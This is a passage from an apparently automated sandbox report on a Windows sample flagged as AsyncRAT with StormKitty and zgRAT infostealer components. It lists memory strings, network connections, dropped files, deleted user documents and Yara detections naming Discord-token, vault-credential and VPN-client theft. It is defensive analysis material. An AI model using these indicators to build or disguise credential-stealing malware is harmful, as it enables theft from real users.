                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: History.txt.28.dr, History.txt.15.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                    Source: udwnme.exe, 0000000F.00000002.2929858081.0000000004029000.00000004.00000800.00020000.00000000.sdmp, places.raw.15.dr, tmp778C.tmp.dat.15.dr, tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: udwnme.exe, 0000000F.00000002.2929858081.0000000004029000.00000004.00000800.00020000.00000000.sdmp, places.raw.15.dr, tmp778C.tmp.dat.15.dr, tmpAE3C.tmp.dat.28.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64799
                    Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64790 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64791 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64796 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64797 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:64801 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies existing user documents (likely ransomware behavior)
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.pdf

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: svchost.exe PID: 3620, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC3E07_2_017FC3E0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F63D87_2_017F63D8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC7407_2_017FC740
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F6CA87_2_017F6CA8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F60907_2_017F6090
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC3CF7_2_017FC3CF
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FC73F7_2_017FC73F
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F4A547_2_017F4A54
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FAE887_2_017FAE88
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CB6F87_2_075CB6F8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CBE987_2_075CBE98
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075CBE887_2_075CBE88
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D74787_2_075D7478
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D5C007_2_075D5C00
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075DA3307_2_075DA330
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D9BD07_2_075D9BD0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D4BF87_2_075D4BF8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D2AA87_2_075D2AA8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D16D07_2_075D16D0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075DB0507_2_075DB050
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075D40E07_2_075D40E0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076174A07_2_076174A0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076171407_2_07617140
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761A1577_2_0761A157
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076157437_2_07615743
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761E14F7_2_0761E14F
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761E1807_2_0761E180
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_07614EC07_2_07614EC0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_07614ED07_2_07614ED0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109717_2_07610971
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109507_2_07610950
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109A07_2_076109A0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076109907_2_07610990
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FE17_2_076C9FE1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FF07_2_076C9FF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076C9FF07_2_076C9FF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_081888107_2_08188810
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147639015_2_01476390
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_01475AC015_2_01475AC0
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147975015_2_01479750
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147976015_2_01479760
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0147577815_2_01475778
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_054005FE15_2_054005FE
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540060015_2_05400600
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540C10815_2_0540C108
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540C0F715_2_0540C0F7
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05405D5315_2_05405D53
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05405D6015_2_05405D60
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC639028_2_00DC6390
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC5AC028_2_00DC5AC0
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC975028_2_00DC9750
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC577828_2_00DC5778
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_00DC976028_2_00DC9760
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A05FF28_2_050A05FF
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A060028_2_050A0600
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050AC10828_2_050AC108
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050AC0F728_2_050AC0F7
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A5D5328_2_050A5D53
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A5D6028_2_050A5D60
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\udwnme.exe 817940C9DD88C9D185F58532E2027E9DF7BFACA8249EC96AE055DA03C8750F20
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\svchost.exe 9C457B1CD061AE951FBED7841149B247E085BEFA6E2C5170058CE35CDEBCE548
                    Source: zrrHgsDzgS.exe, 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exeBinary or memory string: OriginalFilenameStub.exe" vs zrrHgsDzgS.exe
                    Source: zrrHgsDzgS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
